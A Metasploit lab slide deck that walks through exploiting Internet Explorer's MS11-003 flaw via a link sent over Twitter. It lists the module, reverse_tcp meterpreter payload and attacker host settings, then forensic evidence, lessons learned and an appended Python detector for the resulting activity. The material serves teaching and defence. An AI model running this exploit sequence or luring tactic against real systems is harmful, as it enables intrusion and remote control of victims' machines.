Metasploit Exploitation Scenarios -EN : Scenario 1

First part of the Metasploit Exploitation Scenarios series

Published in: Technology

    1. Metasploit Scenarios : Scenario 1
       http://eromang.zataz.com - http://twitter.com/eromang

    2. Scenario 1 : Topology
       Target (192.168.111.0/24) -- Firewall Gateway -- Attacker (192.168.178.0/24)
       Target :
         - Windows XP SP3
         - User has an admin profile
         - IP : 192.168.111.129
         - Default gateway : 192.168.111.128
         - No anti-virus / local Windows Firewall activated
         - Vulnerable to MS11-03
       Firewall Gateway :
         - Eth0 : 192.168.111.128 (internal interface)
         - Eth1 : 192.168.178.59 (external interface)
       Attacker :
         - IP : 192.168.178.21

    3. Scenario 1 : Firewall rules
       • Firewall administration by SSH only from the internal network
       • The internal network is allowed to initiate «Any» protocol to the external network

    4. Scenario 1 : Story-Board
       ✤ This network topology corresponds to most broadband ADSL Internet connections for home users and SMBs.
       ✤ The attacker sends a Twitter message to the target. The message contains a malicious URL (possibly shortened) crafted to exploit the Internet Explorer MS11-03 vulnerability.
       ✤ The target clicks on the provided link and MS11-03 is exploited.
       ✤ After exploitation, a reverse_tcp meterpreter payload, on port 4444/TCP, is launched.
       ✤ No further post-exploitation.

    5. Scenario 1 : Metasploit commands
       use exploit/windows/browser/ms11_003_ie_css_import
       set SRVHOST 192.168.178.21
       set SRVPORT 80
       set URIPATH /readme.html
       set PAYLOAD windows/meterpreter/reverse_tcp
       set LHOST 192.168.178.21
       exploit
       sysinfo
       ipconfig
       route
       getuid

    6. Scenario 1 : Evidences
       Internet Explorer process is created :
         A new process has been created:
         New Process ID: 3200
         Image File Name: C:\Program Files\Internet Explorer\iexplore.exe
         Creator Process ID: 2224
         User Name: romang
         Domain: ERIC-FD2123B3C5
         Logon ID: (0x0,0x62764)
       Internet Explorer process creates a new «notepad.exe» process :
         A new process has been created:
         New Process ID: 3972
         Image File Name: C:\WINDOWS\system32\notepad.exe
         Creator Process ID: 3200
         User Name: romang
         Domain: ERIC-FD2123B3C5
         Logon ID: (0x0,0x62764)
       Logs on the Firewall Gateway :
         Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0

    7. Scenario 1 : Lessons Learned
       • Update your OS and applications !
       • Don't run applications with administrator privileges !
       • Never click on unknown links, especially shortened URLs, from unknown sources !
       • Install an antivirus, and don't trust it blindly :)
       • Don't trust your firewalls (local or remote) !
       • Don't allow «Any» outbound protocol connections from your internal network to untrusted networks ! Limit your outbound connections to your real needs.
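The "Evidences" slide shows the two artifacts a defender could have alerted on in this scenario: a browser process spawning an unexpected child, and a firewall ACCEPT of a new outbound connection from the LAN to the meterpreter reverse_tcp port. The following Python is an added example, not part of the deck; the sample events and log line are constructed in the style of the slide, and the child-process watch-list is an assumption.

```python
# Constructed sample evidence modelled on the deck's "Evidences" slide (not the original logs).
PROCESS_EVENTS = """\
A new process has been created:
New Process ID: 3200
Image File Name: C:\\Program Files\\Internet Explorer\\iexplore.exe
Creator Process ID: 2224
A new process has been created:
New Process ID: 3972
Image File Name: C:\\WINDOWS\\system32\\notepad.exe
Creator Process ID: 3200
"""
FIREWALL_LOG = ("Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 "
                "SRC=192.168.111.129 DST=192.168.178.21 PROTO=TCP SPT=1078 DPT=4444 SYN URGP=0")

BROWSERS = {"iexplore.exe"}
SUSPECT_CHILDREN = {"notepad.exe", "cmd.exe", "powershell.exe"}  # assumed local watch-list
basename = lambda image: image.rsplit("\\", 1)[-1].lower()


def parse_process_events(text):
    """One dict per 'A new process has been created' block, keyed by the event's field names."""
    events, current = [], None
    for line in text.splitlines():
        if line.startswith("A new process has been created"):
            current = {}
            events.append(current)
        elif current is not None and ": " in line:
            key, value = line.split(": ", 1)
            current[key] = value.strip()
    return events

def suspicious_child_processes(events):
    """(parent image, child image) pairs where a browser spawned a watch-listed child."""
    by_pid = {e["New Process ID"]: e for e in events}
    pairs = [(by_pid.get(e["Creator Process ID"]), e) for e in events]
    return [(p["Image File Name"], c["Image File Name"]) for p, c in pairs
            if p and basename(p["Image File Name"]) in BROWSERS
            and basename(c["Image File Name"]) in SUSPECT_CHILDREN]

def parse_iptables(line):
    """KEY=VALUE tokens of a netfilter log line -> dict; bare flags such as SYN map to True."""
    toks = [t.partition("=") for t in line.split()]
    return {k: (v if sep else True) for k, sep, v in toks if sep or k.isupper()}

def is_reverse_shell_callback(fields, internal_prefix="192.168.111."):
    """Outbound TCP SYN from the LAN to 4444/TCP, the deck's meterpreter reverse_tcp port."""
    return (fields.get("PROTO") == "TCP" and fields.get("DPT") == "4444"
            and fields.get("SYN") is True and fields.get("SRC", "").startswith(internal_prefix))
```

Both checks are cheap to run continuously; the second one is exactly the class of traffic the last slide's "limit outbound connections to your real needs" rule would have blocked rather than merely logged.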
